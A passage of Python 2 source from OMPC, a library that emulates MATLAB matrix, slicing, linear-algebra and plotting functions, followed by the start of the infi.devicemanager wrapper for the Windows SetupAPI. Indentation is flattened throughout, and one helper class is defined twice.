return mrdivide(left, self)
def __add__(self, him): return plus(self, him)
def __radd__(self, him): return plus(him, self)
def __sub__(self, him): return minus(self, him)
def __rsub__(self, him): return minus(him, self)
def __neg__(self): return uminus(self)
# comparisons
def __ge__(self, other): return ge(self, other)
def __gt__(self, other):
if isinstance(other, _marray): other = other._a
return _marray('bool', self.msize, self._a > other)
def __le__(self, other):
if isinstance(other, _marray): other = other._a
return _marray('bool', self.msize, self._a <= other)
def __lt__(self, other):
if isinstance(other, _marray): other = other._a
return _marray('bool', self.msize, self._a < other)
def __eq__(self, other):
if isinstance(other, _marray): other = other._a
return _marray('bool', self.msize, self._a == other)
def __ne__(self, other):
if isinstance(other, _marray): other = other._a
return _marray('bool', self.msize, self._a != other)
# element access
def __iter__(self):
#return (_marray(self.dtype, (1,1), x) for x in self._a.flat )
#return iter(self._a.flat)#(_marray(self.dtype, (1,1), x) for x in self._a.flat )
return ( float(x) for x in self._a.flat )
#(_marray(self.dtype, (1,1), x) for x in self._a.flat )
def __len__(self):
return max(self.msize)
def __base0__(self, shp=None):
# FIXME: issue a warning on non-integers
if self.dtype == 'bool':
return self._a
ind = (self._a - 1).T.astype('i4')
        if ind.ndim == 2 and (ind.shape[0] == 1 or ind.shape[1] == 1):
ind = ind.reshape(-1)
# if ind.ndim == 2 and ind.shape[0] == 1:
# ind = ind[0]
return ind
def __getitem__(self, i):
# determine the size of the new array
if not hasattr(i, '__len__'): i = [i]
nshp = _ndshape(self.msize, *i)
#return _marray(self.dtype, nshp, self._a.__getitem__(reversed(i)))
return _marray(self.dtype, nshp, self._a.__getitem__(i[::-1]))
# >> a = reshape(1:15,5,3)
# >> a(eye(3)==1)
# ans = [1, 5, 9]
def __getitem1__(self, i):
# determine the size of the new array
#if not hasattr(i, '__len__'): i = [i]
nshp = _ndshape1(self.msize, *i)
ri = []
if len(i) == 1:
i = i[0]
if self.msize[0] == 1: ri = (i.__base0__(self.msize[1]), 0)
elif self.msize[1] == 1: ri = (0, i.__base0__(self.msize[0]))
else:
# access to a flat array
msize = _size(i)
if isinstance(i, mvar): i = i.__base0__(len(self._a.flat))
na = self._a.flat[i]
return _marray(self.dtype, msize, na.reshape(msize[::-1]))
else:
di = len(self.msize)-1
for x in reversed(i):
if isinstance(x, mvar): ri.append(x.__base0__(self.msize[di]))
else: ri.append(x-1)
di -= 1
na = self._a.__getitem__(tuple(ri))
return _marray(self.dtype, nshp, na.reshape(nshp[::-1]))
def __setitem__(self, i, val):
if isinstance(val, _marray): val = val._a
self._a.__setitem__(i[::-1], val)
def __setitem1__(self, i, val):
# determine the size of the new array
if isinstance(val, _marray): val = val._a
ri = []
if len(i) == 1:
# stupid numpy a = rand(1,10); b = rand(1,2); a[0,[3,4]] = b
# doesn't work
i = i[0]
if self.msize[0] == 1:
ri = (i.__base0__(self.msize[1]), 0)
val = val[0]
elif self.msize[1] == 1:
ri = (0, i.__base0__(self.msize[0]))
val = val[0]
else:
# access to a flat array
msize = _size(i)
if isinstance(i, mvar): i = i.__base0__(len(self._a.flat))
self._a.flat[i] = val
return
else:
di = len(self.msize)-1
for x in reversed(i):
if isinstance(x, mvar): ri.append(x.__base0__(self.msize[di]))
else: ri.append(x-1)
di -= 1
self._a.__setitem__(tuple(ri), val)
# properties
def transposed(self):
return transpose(self)
def ctransposed(self):
return ctranspose(self)
T = property(transposed, None, None, "Transpose.")
    cT = property(ctransposed, None, None, "Conjugate transpose.")
# IO
def __str__(self):
return print_marray(self)
def __repr__(self):
return "marray(%r, %r)"%(self.dtype, self.msize)
class mcellarray(mvar, list):
pass
# from the end of
# http://code.activestate.com/recipes/52558/
class _MEnd(object):
'''This object serves as an emulator of the "end" statement of MATLAB.
We want to use the "is" operator therefore we need a singletion.'''
__instance = None # the unique instance
def __new__(cls):
if cls.__instance is None:
cls.__instance = object.__new__(cls)
object.__init__(cls.__instance)
return cls.__instance
def __init__(self):
# prevent the automatic call of object's __init__, it is init-ed once
# in the __new__ function
pass
def __repr__(self):
return 'end'
def __str__(self):
return '(m-end object)'
def __int__(self):
return sys.maxint
end = _MEnd()
def _mslicelen(start, stop, step):
if stop is end or stop is None:
return sys.maxint
    return int(np.floor((stop-start)/step) + 1)
class _mslice(mvar):
"""m-slice MATLAB style slice object.
You can instantiate this class only by the helper mslice:
>>> mslice[1:10]
"""
def __init__(self, start, stop=None, step=None):
raise NotImplementedError("Direct instantiation is not allowed.")
def init(self, start, stop, step):
if start is None: start = 1
if step is None: step = 1
self.start = start
self.stop = stop
self.step = step
self.dtype = 'double'
self.msize = (1, _mslicelen(self.start, self.stop, self.step))
def init_data(self):
if self._a is None:
self._a = np.array(list(self), dtype='f8').reshape(self.msize[::-1])
def evaluate_end(self, i):
start = self.start
step = self.step
stop = self.stop
if stop is end:
return mslice[start:step:i]
else:
return self
def _ctypes_get(self):
# Create and initialize a real data buffer, then let the default
# function to return the ctypes pointer
if self.stop is end:
raise RuntimeError("Infinite slice can be only used as an index.")
# return None
self.init_data()
return self._a.ctypes
ctypes = property(_ctypes_get, None, None,
"Ctypes-wrapped data object.")
def __iter__(self):
value = self.start
if self.step < 0:
while value >= self.stop:
yield float(value)
value += self.step
else:
while value <= self.stop:
yield float(value)
value += self.step
def __getitem__(self, i):
val = self.start + self.step*i
if val > self.stop:
raise OMPCException('Index exceeds matrix dimensions!')
return float(val)
# self.init_data()
# na = self._a.__getitem__(i)
# return _marray('double', na.shape[::-1], na.reshape(na.shape[::-1]))
def __getitem1__(self, i):
val = self.start + self.step*(i-1)
if val > self.stop:
raise OMPCException('Index exceeds matrix dimensions!')
return float(val)
# self.init_data()
# return _marray('double', self.msize, self._a).__getitem1__(i)
def __len__(self):
if self.stop is end:
# FIXME: how should this be done
# raise AssertionError("This is impossible for a code translated "
# "from a functional MATLAB code.")
# Python allows returning of positive integers only!
return sys.maxint
return _mslicelen(self.start, self.stop, self.step)
def __repr__(self):
return 'mslice[%r:%r:%r]'%\
(self.start, self.step, self.stop)
def __str__(self):
if self.stop is None:
it = iter(self)
return ', '.join( str(it.next()) for i in xrange(3) ) + ' ...'
elif len(self) > 10:
it = iter(self)
retval = self.__repr__() + '\n'
retval += ', '.join( str(it.next()) for i in xrange(3) ) + ' ... '
lastval = self.start + (len(self)-1)*self.step
return retval + str(lastval)
return ', '.join( map(str, self) )
def hasnoend(self):
'Returns true if "self.stop is end".'
return self.stop is end
def __copy__(self):
self.init_data()
return _marray(self.dtype, self.msize, self._a.copy())
def __deepcopy__(self):
self.init_data()
return _marray(self.dtype, self.msize, self._a.copy())
def __base0__(self,shp=None):
if self.hasnoend():
assert shp is not None
return slice(self.start-1, shp, self.step)
return slice(self.start-1, self.stop, self.step)
class _mslice_helper:
def __getitem__(self, i):
s = _mslice.__new__(_mslice)
# FIXME: there is no way of differentiating between mslice[:]
# and mslice[0:], the second will never appear in a code written for
# MATLAB.
# !!! actually, maybe possible by look-back in the stack ?!!
start, stop, step = i.start, end, 1
if i.step is None:
# there are only 2 arguments, stop is i.stop
if i.start == 0 and i.stop == sys.maxint:
# a special case
start = 1
elif i.stop == sys.maxint:
# this is what happens when syntax [start:] is used
raise IndexError(
'Use 2- and 3-slices only. Use "end" instead of "None".')
else: stop = i.stop
else:
# there are all 3 arguments, stop is actually i.step
# 1:2:10 -> slice(1,2,10) -> mslice(1,10,2)
stop = i.step
step = i.stop
s.init(start, stop, step)
return s
class _mslice_helper:
def __getitem__(self, i):
s = _mslice.__new__(_mslice)
# FIXME: there is no way of differentiating between mslice[:]
# and mslice[0:], the second will never appear in a code written for
# MATLAB.
# !!! actually, maybe possible by look-back in the stack ?!!
start, stop, step = i.start, end, 1
if i.step is None:
# there are only 2 arguments, stop is i.stop
if i.start == 0 and i.stop == sys.maxint:
# a special case
start = 1
elif i.stop == sys.maxint:
# this is what happens when syntax [start:] is used
raise IndexError(
'Use 2- and 3-slices only. Use "end" instead of "None".')
else: stop = i.stop
# there are all 3 arguments, stop is actually i.step
elif i.stop < 0:
stop = i.step
step = i.stop
else:
# 1:2:10 -> slice(1,2,10) -> mslice(1,10,2)
stop = i.step
step = i.stop
s.init(start, stop, step)
if not s.hasnoend():
s.init_data()
return _marray('double', s.msize, s._a.copy())
return s
mslice = _mslice_helper()
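# Illustrative sketch (added, not part of the original OMPC sources): how the
# mslice helper maps Python slice syntax onto MATLAB ranges.  Note the argument
# order of 3-slices, mslice[a:b:c] stands for MATLAB's a:b:c (start:step:stop).
def _demo_mslice():
    a = mslice[1:10]      # MATLAB 1:10, returned as a 1x10 marray
    b = mslice[1:2:10]    # MATLAB 1:2:10, i.e. the values 1, 3, 5, 7, 9
    c = mslice[1:end]     # open-ended range, usable only as an index, x(1:end)
    return a, b, c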
class mstring(mvar, str):
def __init__(self, s):
mvar.__init__(self)
self.dtype = 'char'
self.msize = (1, len(s))
self._a = s
def __len__(self):
return len(self._a)
def __str__(self):
return self._a
def __repr__(self):
return 'mstring(%r)'%self._a
def _m_constructor_args(*X):
from operator import isSequenceType
dtype = 'double'
if type(X[-1]) is str:
dtype = X[-1]
X = X[:-1]
if len(X) == 1:# and isSequenceType(X):
X = X[0]
#X = X[0], X[0]
return X, dtype
@_ompc_base
def empty(*X):
# check for class
X, dt = _m_constructor_args(*X)
return _marray.empty(X, dt)
@_ompc_base
def zeros(*X):
# check for class
X, dt = _m_constructor_args(*X)
return _marray.zeros(X, dt)
@_ompc_base
def ones(*X):
# check for class
X, dt = _m_constructor_args(*X)
return _marray.ones(X, dt)
@_ompc_base
def eye(*X):
if len(X) == 0:
return _marray.ones((1,1), 'double')
# check for class
X, dt = _m_constructor_args(*X)
kw = dict(dtype=_dtype2numpy[dt])
if not hasattr(X, '__len__'): X = (X,)
na = np.eye(*X[::-1], **kw)
return _marray(dt, na.shape[::-1], na)
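# Illustrative sketch (added, not part of the original OMPC sources): the
# MATLAB-style constructors defined above.  A single size argument means a
# square matrix; a trailing string would select the dtype via _dtype2numpy.
def _demo_constructors():
    z = zeros(3)          # 3x3 matrix of zeros
    o = ones(2, 3)        # 2x3 matrix of ones
    i = eye(3)            # 3x3 identity matrix
    return z, o, i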
@_ompc_base
def mcat(i):
"""Concatenate a list of matrices into a single matrix using separators
',' and ';'. The ',' means horizontal concatenation and the ';' means
vertical concatenation.
"""
if i is None:
return marray()
# calculate the shape
rows = [[]]
final_rows = 0
final_cols = 0
crows = ccols = 0
pos = []
pos2 = []
for x in i:
#if x == ';':
if x is Ellipsis:
rows.append([])
if final_cols > 0 and final_cols != ccols:
error("Incompatible shapes!")
else:
final_cols = ccols
final_rows += crows
ccols = 0
pos.append(Ellipsis)
elif isinstance(x, mvar):
shp = x.msize
if len(shp) < 1: shp = [0]
if len(shp) < 2: shp += [0]
rows[-1].append(shp[0])
pos.append( (slice(final_rows, final_rows+shp[0]),
slice(ccols, ccols+shp[1])) )
crows = shp[0] # FIXME
ccols += shp[1]
elif _isscalar(x):
rows[-1].append(1)
pos.append( (final_rows, ccols) )
crows = 1
ccols += 1
else:
raise OMPCException("Unsupported type: %s!"%type(x))
if final_cols > 0 and final_cols != ccols:
error("Incompatible shapes!")
else:
final_cols = ccols
final_rows += crows
out = empty((final_rows, final_cols), 'double')
for sl, x in _izip(pos, i):
if x is not Ellipsis:
if isinstance(x, mvar): x = x._a
out._a.__setitem__(sl[::-1], x)
#out._a.reshape(final_cols, final_rows).T.__setitem__(sl, x)
return out
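# Illustrative sketch (added, not part of the original OMPC sources): mcat
# builds a matrix from a flat list in which Ellipsis (usually aliased as
# OMPCSEMI) plays the role of MATLAB's ';' row separator.
def _demo_mcat():
    a = mcat([1, 2, 3, Ellipsis, 4, 5, 6])   # the 2x3 matrix [1 2 3; 4 5 6]
    return a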
def who(*args,**kwargs):
nargin, nargout = _get_narginout(0)
import __main__
ns = __main__.__dict__
vars = [ x for x in ns \
if isinstance(ns[x], mvar) and x[0] != '_' ]
if args:
vars = [ x for x in vars if x in args ]
vars.sort()
if nargout == 0:
print 'Your variables are:'
print ' '.join(vars)
else:
return mcellarray(vars)
@_ompc_base
def whos(*args, **kwargs):
"""Return list of variables in the current workspace."""
nargin, nargout = _get_narginout(0)
import __main__
ns = __main__.__dict__
vars = [ x for x in ns \
if isinstance(ns[x], mvar) and x[0] != '_' ]
if args:
vars = [ x for x in vars if x in args ]
vars.sort()
if nargout == 0:
cols = ['Name', 'Size', 'Bytes', 'Class', 'Attributes']
print ' %10s %15s %15s %10s %10s '%tuple(cols)
for xname in vars:
x = ns[xname]
print ' %10s %15r %15r %10s '%(xname, x.msize, x._a.nbytes, x.dtype)
print
else:
raise NotImplementedError()
@_ompc_base
def size(X):
return X.msize
@_ompc_base
def rand(*args):
if isinstance(args[0], str):
raise NotImplemented
if len(args) == 1:
args = (args[0], args[0])
return _marray('double', args, np.random.rand(*args[::-1]))
@_ompc_base
def randn(*args):
if isinstance(args[0], str):
raise NotImplemented
if len(args) == 1:
args = (args[0], args[0])
return _marray('double', args, np.random.randn(*args[::-1]))
@_ompc_base
def reshape(A, *newsize):
if len(newsize) == 0:
raise OMPCException('??? Error using ==> reshape\n'
'Not enough input arguments.')
if len(newsize) == 1 and hasattr(newsize, '__len__'):
newsize = newsize[0]
if not np.prod(A.msize) == np.prod(newsize):
raise OMPCException('??? Error using ==> reshape\n'
'To RESHAPE the number of elements must not change.')
out = A.__copy__()
out.msize = newsize
out._a = out._a.reshape(newsize[::-1])
return out
@_ompc_base
def fliplr(X):
if X._a.ndim != 2:
error('X must be a 2-D matrix.')
return _marray(X.dtype, X.msize, np.flipud(X._a))
@_ompc_base
def flipud(X):
if X._a.ndim != 2:
error('X must be a 2-D matrix.')
return _marray(X.dtype, X.msize, np.fliplr(X._a))
@_ompc_base
def sum(A, *dimtype):
restype = 'double'
dim = 1
if len(dimtype) == 2:
dim = dimtype[0]
dimtype = dimtype[1]
elif len(dimtype) == 1:
dimtype = dimtype[0]
if isinstance(dimtype, str):
if dimtype == 'native':
restype = A.dtype
else:
restype = dimtype
else:
dim = dimtype
msize = A.msize
if A.msize[dim-1] == 1:
return A.__copy__()
nshp = list(msize)
nshp[dim-1] = 1
if len(nshp) > 2 and nshp[-1] == 1: nshp = nshp[:-1]
# use numpy's sum
a = np.sum(A._a, len(msize)-dim)
return _marray(A.dtype, nshp, a.reshape(nshp[::-1]))
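# Illustrative sketch (added, not part of the original OMPC sources): sum
# follows MATLAB's convention and reduces along the first dimension by default,
# i.e. it returns column sums for a 2D matrix.
def _demo_sum():
    a = _marray('double', (2, 3), [1., 2., 3., 4., 5., 6.])  # [1 3 5; 2 4 6]
    return sum(a)   # the 1x3 row [3, 7, 11]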
@_ompc_base
def find(cond):
a = mpl.find(cond._a.reshape(-1)) + 1
msize = (len(a), 1)
if len(cond.msize) == 2 and cond.msize[0] == 1:
msize = (1, len(a))
return _marray('double', msize, a.astype('f8').reshape(msize[::-1]))
try: _inv = np.oldnumeric.linear_algebra.inverse
except: _inv = np.linalg.inv
@_ompc_base
def inv(X):
assert len(X.msize) == 2 and X.msize[0] == X.msize[1]
return _marray('double', X.msize, _inv(X._a.T).T)
_eig = np.linalg.eig
@_ompc_base
def eig(X):
assert len(X.msize) == 2 and X.msize[0] == X.msize[1]
nargin, nargout = _get_narginout(1)
[V, D] = _eig(X._a.T)
if nargout == 1:
return _marray('double', (len(V), 1), V.reshape(1, -1))
elif nargout == 2:
V = np.diag(V.reshape(-1))
return _marray('double', D.shape[::-1], D.T), \
_marray('double', V.shape, V)
else:
raise OMPCException('Too many output arguments.')
_svd = np.linalg.svd
@_ompc_base
def svd(X, *args):
if len(args) > 0:
raise NotImplementedError()
assert len(X.msize) == 2 and X.msize[0] == X.msize[1]
nargin, nargout = _get_narginout(1)
[U, S, V] = _svd(X._a.T)
# V is transposed already
if nargout == 1:
return _marray('double', (len(S), 1), S.reshape(1, -1))
elif nargout == 3:
S = np.diag(S.reshape(-1))
return _marray('double', U.shape[::-1], U.T), \
_marray('double', S.shape[::-1], S), \
_marray('double', V.shape, V)
else:
raise OMPCException('Incorrect number of output arguments.')
@_ompc_base
def poly(X):
na = np.poly(X._a.T)
return _marray('double', (1, len(na)), na.reshape(-1, 1))
@_ompc_base
def roots(X):
assert len(X.msize) == 2 and (X.msize[0] == 1 or X.msize[1] == 1)
na = np.roots(X._a.reshape(-1))
return _marray('double', (len(na), 1), na.reshape(1, -1))
@_ompc_base
def conv(X, Y):
assert len(X.msize) == 2 and (X.msize[0] == 1 or X.msize[1] == 1)
assert len(Y.msize) == 2 and (Y.msize[0] == 1 or Y.msize[1] == 1)
na = np.convolve(X._a.reshape(-1), Y._a.reshape(-1))
msize = (1, len(na))
if Y.msize[1] == 1:
msize = (len(na), 1)
return _marray('double', msize, na.reshape(msize[::-1]))
@_ompc_base
def round(X):
return _marray('double', X.msize, np.around(X._a))
@_ompc_base
def floor(X):
return _marray('double', X.msize, np.floor(X._a))
@_ompc_base
def ceil(X):
return _marray('double', X.msize, np.ceil(X._a))
@_ompc_base
def fix(X):
return _marray('double', X.msize, np.fix(X._a))
def _what(X):
if isinstance(X, mvar):
return X.dtype, X.msize
elif isinstance(X, int):
return 'int32', (1, 1)
elif isinstance(X, float):
return 'double', (1, 1)
else:
raise NotImplementedError()
@_ompc_base
def mod(X, i):
dtype, msize = _what(X)
if isinstance(X, mvar): X = X._a
if isinstance(i, mvar):
if i.msize != msize:
raise OMPCException("Matrix dimensions must agree!")
i = i._a
if i == 0:
return _marray(dtype, msize, X)
elif np.all(X == i):
return zeros(msize, dtype)
na = np.mod(X, i)
return _marray(_numpy2dtype[na.dtype], msize, na)
@_ompc_base
def sqrt(X):
if _isscalar(X):
X = _marray('double', (1,1), [X])
if np.any(X._a < 0):
return _marray('complex', X.msize, np.sqrt(X._a.astype('complex128')))
else:
return _marray('double', X.msize, np.sqrt(X._a))
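# Illustrative sketch (added, not part of the original OMPC sources): like
# MATLAB, sqrt promotes to a complex result when the input has negative values.
def _demo_sqrt():
    x = _marray('double', (1, 1), [-4.0])
    return sqrt(x)    # complex marray holding 0 + 2j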
@_ompc_base
def magic(n):
# from Octave's magic.m
A = empty((n, n), 'double')
if n == 0:
return marray([])
elif mod (n, 2) == 1:
shift = floor ((mslice[0:n*n-1])/n)
c = mod(mslice[1:n*n] - shift + (n-3)/2, n)
r = mod(mslice[n*n:-1:1] + 2*shift, n)
A(c*n+r+1).lvalue = mslice[1:n*n]
A = reshape(A, n, n);
elif mod(n, 4) == 0:
A = reshape(mslice[1:n*n], n, n).cT;
I = mcat([mslice[1:4:n], mslice[4:4:n]])
J = fliplr(I);
A(I,I).lvalue = A(J,J)
I = mcat([mslice[2:4:n], mslice[3:4:n]]);
J = fliplr(I);
A(I,I).lvalue = A(J,J);
elif mod(n, 4) == 2:
m = n/2
A = magic(m)
A = mcat([A, A+2*m*m, OMPCSEMI, A+3*m*m, A+m*m])
k = (m-1)/2
if k > 1:
I = mslice[1:m]
J = mcat([mslice[2:k], mslice[n-k+2:n]])
A([I,I+m],J).lvalue = A([I+m,I],J)
        I = mcat([mslice[1:k], mslice[k+2:m]])
A([I,I+m],1).lvalue = A([I+m,I],1);
I = k + 1
A([I,I+m],I).lvalue = A([I+m,I],I)
return A
from os.path import normpath as _normpath
import scipy.io
@_ompc_base
def load(*X):
X = list(X)
format = None
re = []
vars = []
if X[0].strip()[0] == '-':
op = X.pop(0).strip()
if op.lower() == '-ascii': format = 'a'
elif op.lower() == '-mat': format = 'm'
else: raise OMPCException('Unknown option "%s".'%op)
# next must be filename
fname = X.pop(0)
base, ext = os.path.splitext(fname)
if not ext:
if os.path.exists(fname):
format = 'a'
else:
ext = '.mat'
fname += ext
format = 'm'
elif ext == '.mat':
format = 'm'
if not os.path.exists(fname):
raise OMPCException('Cannot find file "%s"!'%fname)
# variables
if len(X) > 0:
if X[0].strip()[0] == '-':
# regexp
op = X.pop(0).strip().lower()
if not op == '-regexp':
raise OMPCException('Unknown option "%s".'%op)
re = X
else:
vars = X
fname = _normpath(fname)
# load
if format == 'm':
# scipy makes imports really slow
_loadmat = scipy.io.loadmat
try: d = _loadmat(fname, matlab_compatible=True)
except: raise OMPCException('Cannot open "%s" as an M-file!!'%fname)
data = []
if vars:
data = [ (k, v) for k, v in d.items() if k in vars ]
elif re:
raise NotImplementedError()
else:
data = [ (k, v) for k, v in d.items() if k[:2] != '__' ]
# populate the workspace
import inspect
cf = inspect.currentframe()
for var, val in data:
na = np.asfortranarray(val).T
cf.f_back.f_globals[var] = \
_marray(_numpy2dtype[str(na.dtype)], na.shape[::-1], na)
else:
# ASCII
try: f = file(fname, 'rU')
except: raise OMPCException('Cannot open "%s"!'%fname)
data = []
for x in f:
x = x.strip()
if x.startswith('%'): continue
data += [ map(float, x.split()) ]
na = np.asfortranarray(data, 'f8').T
import inspect
cf = inspect.currentframe()
base = os.path.basename(base)
cf.f_back.f_globals[base] = _marray('double', na.shape[::-1], na)
# _ompc_base
# def save(*X):
# import inspect
# f = inspect.currentframe()
# d = {}
# for var in args:
# d[var] = f.f_back.f_globals[var]
# _savemat(fname, d)
@_ompc_base
def length(X):
return len(X)
_fft = np.fft.fft
@_ompc_base
def fft(X,N=mcat([]),axis=None):
    if axis is not None: axis = len(X.msize) - axis
if len(X.msize) == 2:
if X.msize[0] == 1:
X = X._a.reshape(-1)
else:
if axis is None: axis = len(X.msize)-1
X = X._a
elif len(X.msize) > 2:
if axis is None:
# first non-singleton dimension
            for i in xrange(len(X.msize)-1,-1,-1):
if X.msize[i] > 1: break
axis = i
else:
raise NotImplementedError("Less than 2D?")
# N
if isempty(N): N = X.shape[axis]
# do it
na = _fft(X, N, axis)
msize = na.shape[::-1]
    if len(msize) < 2: msize = (msize[0], 1)
return _marray(_numpy2dtype[na.dtype], msize, na)
class mhandle(_marray):
def __init__(self, arg):
_marray.__init__(self, 'double', (1,1), [float(id(arg))])
self._arg = arg
def _plot_args(*args):
from sets import Set
args = list(args)
arrs = [[]]
d = {}
colorspec = False
i = 0
while len(args) > 0:
arg = args.pop(0)
if isinstance(arg, _marray):
sz = arg.msize
if len(sz) == 2 and sz[0] == 1:
arrs[-1] += [ arg._a ]
else:
arrs[-1] += [ arg._a.T ]
elif _isscalar(arg):
arrs[-1] += [ _marray('double', (1,1), arg) ]
        elif isinstance(arg, str):
            if not colorspec and len(arg) <= 3 and \
                len(Set(arg).intersection(
                    'bgrcmykw'+'*-.:,o^v<>s+xDd1234hHp|_')) > 0:
                # a MATLAB linespec string, e.g. 'r--'
                if arg == '*': arg = '+'
                arrs[-1] += [ arg ]
                colorspec = True
            else:
                # otherwise the string names a property and the next argument
                # holds its value
                if len(args) < 1:
                    raise OMPCException(
                        'Missing value for parameter "%s".'%arg)
                val = args.pop(0)
                d[arg] = val
        else:
            args.insert(0, arg)
            colorspec = False
            arrs.extend([d, []])
            break
if not isinstance(arrs[-1], dict): arrs.append(d)
arrs = [ (a, d) for a, d in _izip(arrs[::2], arrs[1::2]) ]
#print 'll', arrs
return arrs
@_ompc_base
def set(x,*args):
if not isinstance(x, mhandle):
raise OMPCException("First argument must be an object handle!")
o = x._arg
    # pair up the remaining arguments as property name, value pairs
    if len(args) % 2 != 0:
        raise OMPCException("Expected property name, value pairs!")
    kwargs = dict(zip(args[::2], args[1::2]))
    for k, v in kwargs.items():
        try: getattr(o,'set_%s'%k)(v)
        except: print "Property '%s' not supported."%k
@_ompc_base
def xlabel(*args):
# d = _plot_args(args[1:])
return mhandle(mpl.xlabel(args[0]))
@_ompc_base
def ylabel(*args):
# d = _plot_args(args[1:])
return mhandle(mpl.ylabel(args[0]))
@_ompc_base
def zlabel(*args):
# d = _plot_args(args[1:])
return mhandle(mpl.zlabel(args[0]))
@_ompc_base
def plot(*args):
d = _plot_args(*args)
for x, kwargs in d:
mpl.plot(*x, **kwargs)
ha = mhandle(mpl.gca())
mpl.draw()
mpl.hold(False)
mpl.show()
return ha
@_ompc_base
def bar(*args):
ha = mpl.gca()
opts = None
width = 0.8
if isinstance(args[0], mhandle):
ha = args[0]
args = args[1:]
if isinstance(args[-1], str):
opts = args[-1]
args = args[:-1]
X, Y = None, None
if len(args) == 1:
Y = args[0]._a
X = mslice[1:len(Y)]._a
elif len(args) >= 2:
X = args[0]._a
Y = args[1]._a
if len(args) == 3:
width = args[2]._a
X = X.reshape(-1)
if len(Y.shape) == 2 and Y.shape[0] == 1: Y = Y.T
res = mpl.bar(X, Y, width)
ha = mhandle(res)
mpl.hold(False)
mpl.show()
return ha
@_ompc_base
def axis(*args):
nargin, nargout = _get_narginout(0)
if nargout > 0:
raise OMPCException('Too many output arguments.')
ha = mpl.gca()
if len(args) == 2:
ha = args[0]._arg
args = args[1:]
if len(args) > 1:
raise OMPCException('Too many input arguments.')
x = args[0]
    if isinstance(x, str):
        try:
            mpl.axis(x)
        except:
            raise NotImplementedError()
        return
assert isinstance(x, _marray)
mpl.axis(x._a.reshape(-1))
@_ompc_base
def grid(*args):
b = None #trigger
ha = mpl.gca()
kwargs = {}
if len(args) == 1:
# isinstance(args[0], mstring) not necessary if mstring inherits str
        x = args[0]
        if isinstance(x, str):
            x = x.lower()
            if x == 'on': b = True
            elif x == 'off': b = False
            elif x == 'minor':
                # FIXME: issue a warning only
                raise NotImplementedError("Minor axis not ready yet!")
            else:
                raise OMPCException('Unknown option "%s"!'%x)
elif isinstance(x, mhandle):
ha = x
else:
raise OMPCException(
'First argument must be an axes handle or a string.')
elif len(args) > 1:
if not isinstance(args[0], mhandle):
raise OMPCException('First argument must be an axes handle.')
if len(args)%2 > 0:
raise OMPCException('Name, value pairs expected after a handle.')
kwargs = dict([(k, v) for k, v in _izip(args[1::2], args[2::2])])
# FIXME: issue a warning only
raise NotImplementedError("Setting parmeters not ready yet!")
if not hasattr(ha, 'grid'):
ha = ha.get_axes()
ha.grid(b)
mpl.draw()
@_ompc_base
def title(*args):
    mpl.title(args[0])
@_ompc_base
def legend(*args):
mpl.legend(args)
|
StarcoderdataPython
|
215036
|
<reponame>MakaronKanon/infi.devicemanager
__import__("pkg_resources").declare_namespace(__name__)
from contextlib import contextmanager
from infi.exceptools import chain
from .setupapi import functions, properties, constants
from infi.pyutils.lazy import cached_method
from logging import getLogger
ROOT_INSTANCE_ID = u"HTREE\\ROOT\\0"
GLOBALROOT = u"\\\\?\\GLOBALROOT"
logger = getLogger(__name__)
class Device(object):
def __init__(self, instance_id):
super(Device, self).__init__()
self._instance_id = instance_id
def __repr__(self):
# we cant use hasattr and getattr here, because friendly_name is a property method that may raise exception
return u"<{}>".format(self.friendly_name if self.has_property("friendly_name") else self.description)
@contextmanager
def _open_handle(self):
dis, devinfo = None, None
try:
dis = functions.SetupDiCreateDeviceInfoList()
devinfo = functions.SetupDiOpenDeviceInfo(dis, self._instance_id)
yield (dis, devinfo)
finally:
if dis is not None:
functions.SetupDiDestroyDeviceInfoList(dis)
def _get_setupapi_property(self, key):
from .setupapi import WindowsException
with self._open_handle() as handle:
dis, devinfo = handle
try:
return functions.SetupDiGetDeviceProperty(dis, devinfo, key).python_object
except WindowsException as exception:
if exception.winerror == constants.ERROR_NOT_FOUND:
raise KeyError(key)
chain(exception)
@property
@cached_method
def class_guid(self):
guid = self._get_setupapi_property(properties.DEVPKEY_Device_ClassGuid)
return functions.guid_to_pretty_string(guid)
@property
@cached_method
def description(self):
try:
return self._get_setupapi_property(properties.DEVPKEY_Device_DeviceDesc)
except KeyError:
return 'description unavailable'
@property
@cached_method
def hardware_ids(self):
return self._get_setupapi_property(properties.DEVPKEY_Device_HardwareIds)
@property
@cached_method
def instance_id(self):
return self._get_setupapi_property(properties.DEVPKEY_Device_InstanceId)
@property
@cached_method
def psuedo_device_object(self):
value = self._get_setupapi_property(properties.DEVPKEY_Device_PDOName)
if value is None:
raise KeyError(properties.DEVPKEY_Device_PDOName)
return GLOBALROOT + value
@property
@cached_method
def friendly_name(self):
return self._get_setupapi_property(properties.DEVPKEY_Device_FriendlyName)
@property
@cached_method
def location_paths(self):
return self._get_setupapi_property(properties.DEVPKEY_Device_LocationPaths)
@property
@cached_method
def location(self):
return self._get_setupapi_property(properties.DEVPKEY_Device_LocationInfo)
@property
@cached_method
def bus_number(self):
return self._get_setupapi_property(properties.DEVPKEY_Device_BusNumber)
@property
@cached_method
def ui_number(self):
return self._get_setupapi_property(properties.DEVPKEY_Device_UINumber)
@property
@cached_method
def address(self):
return self._get_setupapi_property(properties.DEVPKEY_Device_Address)
@property
def children(self):
children = []
items = []
try:
items = self._get_setupapi_property(properties.DEVPKEY_Device_Children)
except KeyError:
pass
if items:
for instance_id in items:
children.append(Device(instance_id))
return children
@property
def parent(self):
instance_id = self._get_setupapi_property(properties.DEVPKEY_Device_Parent)
return Device(instance_id)
@property
@cached_method
def instance_id(self):
return self._instance_id
@property
@cached_method
def devnode_status(self):
return self._get_setupapi_property(properties.DEVPKEY_Device_DevNodeStatus)
def is_root(self):
return self._instance_id == ROOT_INSTANCE_ID
def is_real_device(self):
return self.has_property("location")
def is_iscsi_device(self):
try:
hardware_ids = self.hardware_ids
except KeyError:
return False
return any("iscsi" in hardware_id.lower() for hardware_id in hardware_ids)
def is_hidden(self):
return bool(self.devnode_status & constants.DN_NO_SHOW_IN_DM)
def has_property(self, name):
try:
_ = getattr(self, name)
return True
except KeyError:
pass
return False
@cached_method
def get_available_property_ids(self):
result = []
with self._open_handle() as handle:
dis, devinfo = handle
guid_list = functions.SetupDiGetDevicePropertyKeys(dis, devinfo)
for guid in guid_list:
result.append(functions.guid_to_pretty_string(guid))
return result
def rescan(self):
from .cfgmgr32 import open_handle, CM_Reenumerate_DevNode_Ex
if not self.is_real_device() and not self.is_iscsi_device():
return
with open_handle(self._instance_id) as handle:
machine_handle, device_handle = handle
